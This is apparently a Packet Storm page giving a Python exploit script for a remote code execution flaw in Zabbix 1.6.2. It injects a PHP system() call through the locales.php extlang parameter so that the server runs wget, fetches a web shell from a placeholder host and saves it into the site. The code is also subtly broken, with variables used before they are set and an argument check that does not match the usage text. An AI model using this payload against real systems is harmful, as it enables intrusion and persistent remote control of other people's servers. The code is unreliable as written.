Zabbix version 1.6.2 suffers from a code execution vulnerability.
86f3d883d617a5ae5377c71678d17a1db0b1cf46e8c15b15457abc89b6a8e4b7#!/usr/bin/env python
# Title: Zabbix version 1.6.2 Remote Code Execution Exploit
# CVE: ????-????
# Reference: http://www.ush.it/team/ush/hack-zabbix_162/adv.txt
# Author: infodox
# Site: http://insecurety.net/
# Twitter: @info_dox
# Old news, just practicin' my python :3
import requests
import sys
vulnurl = "/locales.php?" # Oh look, the vuln URL!
xpl = "download=1&langTo=1&extlang[%22.system(%27"+cmd+"%27).%22]=1"
cmd = "wget%20"+payloadurl+"%20-O%20shell.php"
payloadurl = "http://example.com/shell.php" # Your evil PHP code goes here right?
def banner():
print """
Zabbix version 1.6.2 remote code execution exploit. Basically PHP Eval() bug :)
Rather lame exploit I must admit, just practicing my Python.
To use, just run it against the host and pray. I advise using a Weevely payload.
~infodox
"""
if len(sys.argv) != 4:
banner()
print "Usage: ./x2.py <target>"
print "Where <target> is the vulnerable website."
print "Example: ./x2.py http://lamesite.com"
sys.exit(1)
banner()
target = sys.argv[1]
pwnme = target + vulnurl + xpl
print "[+] Running Exploit..."
requests.get(pwnme)
print "[?] Gotshell?"
print "[+] Shell should be at "+target+"/shell.php"
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed